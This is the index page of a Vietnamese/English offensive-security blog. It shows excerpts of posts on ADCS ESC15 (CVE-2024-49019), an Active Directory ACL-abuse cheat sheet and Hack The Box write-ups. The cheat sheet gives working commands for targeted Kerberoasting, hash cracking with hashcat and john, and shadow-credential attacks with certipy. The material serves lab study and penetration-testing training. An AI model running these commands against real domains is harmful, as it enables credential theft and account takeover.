Welcome to 0pwn0's Blog

ESC15 (aka EKUwu, CVE-2024-49019) là vector escalate nhanh nhất trong ADCS chain hiện tại nếu gặp V1 template. Nó khai thác việc V1 templates KHÔNG validate Application Policies (OID 1.3.6.1.4.1.311) trong CSR, cho phép inject arbitrary EKU/OID (như Certificate Request Agent hoặc Client Auth) để override EKU gốc (thường chỉ Server Auth). Kết quả: Low-priv user → impersonate DA/krbtgt → dump NTLM hash/DCSync trong <60s. Tại sao OP? Dễ hơn ESC1 (không cần pre-existing Clien...

GenericWrite on User Update object’s attributes Targeted Kerberoasting1targetedKerberoast.py -d domain --dc-ip ip -u username -p password --dc-host dc --request-user target_user 1hashcat -m 13100 -a 0 <hash_file> rockyou.txt --force 1john <hash_file> --wordlist=rockyou.txt ShadowCredentials1certipy shadow auto -u username@domain -p password -account target_user -dc-ip ip Using Kerberos 1certipy shadow auto -username username@domain -k -account target_user -dc-ip ip GenericALL Ful...

IntroductionPurposeThe purpose of this assessment is to evaluate the security of the RustyKey domain by simulating a real-world cyber attack. The goal is to identify vulnerabilities that malicious attackers could exploit to gain unauthorized access, escalate privileges, and compromise sensitive information, thereby providing detailed information about the security weaknesses of the environment. Scope and ObjectivesThe scope of the assessment is limited to the RustyKey domain, a simulated env...

IntroductionThis writeup details the exploitation of the “Voleur” machine from Hack The Box. The primary objectives were to gain unauthorized access, escalate privileges, and retrieve sensitive data, specifically the user and root flags, to evaluate the security posture of the environment. Attack NarrativeThis section provides a detailed account of the red team’s actions, outlining the sequence of events that led to the successful compromise of the Voleur domain. Each step is described with ...

IntroductionThis writeup details the exploitation of the “Artificial” machine from Hack The Box, which showcases interesting vectors involving AI model manipulation and service exploitation. Attack NarrativeThis section provides a detailed account of the red team’s actions, outlining the sequence of events that led to the successful compromise of the Artificial domain. Each step is described with its technical execution and significance. Initial EnumerationFirst, let’s start with a comprehen...